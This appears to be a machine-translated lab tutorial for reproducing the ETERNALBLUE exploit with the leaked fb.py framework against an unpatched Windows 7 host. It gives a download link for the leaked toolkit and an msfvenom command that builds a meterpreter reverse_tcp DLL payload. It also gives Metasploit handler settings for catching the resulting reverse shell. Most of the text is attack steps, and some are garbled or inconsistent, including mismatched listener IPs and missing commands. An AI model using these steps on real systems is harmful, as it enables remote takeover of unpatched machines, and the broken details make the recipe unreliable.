Recurrence of the fb.py of the equation ETERNALBLUE
Recurrence of the fb.py of the equation ETERNALBLUE
1. Brief introduction of environment
* Machine win2003
Ip:192.168.1.105
* Machine kali:
Ip:192.168.1.106
Target window7 x64 (without smb vulnerability patch)
Ip:192.168.1.100
2. Windows 2003 computer
* installation environment of machine win2003:
Python-2.6.6.msi
Https://www.python.org/download/releases/2.6.6/
Pywin32-221.win-amd64-py2.6.exe:
Https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
Download address of equation ETERNALBLUE:
Https://codeload.github.com/misterch0c/shadowbroker/zip/master
After installing python, you need to set the environment variable in win2003:
Copy the windows in the entire ETERNALBLUE directory to the * machine win2003
Create a file in the windows directory as: listeningposts
Run phthon fb.py
The following specific commands for executing fb.py on * machine win2003 are as follows. Other commands are executed by enter.
On the computer kali.
Use msf to generate a dll hijacking file:
Msfvenom-p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555-f dll > / opt/s.dll
Copy the s.dll file to the C disk directory of windows2003:
Enable msfpaylod snooping under msf:
Use exploit/multi/handler
Set lhost 192.168.1.106
Set lport 5555
Set PAYLOAD windows/x64/meterpreter/reverse_tcp
Exploit
4. Then execute under windows2003
Finally, you can see the successful rebound of shell under msf: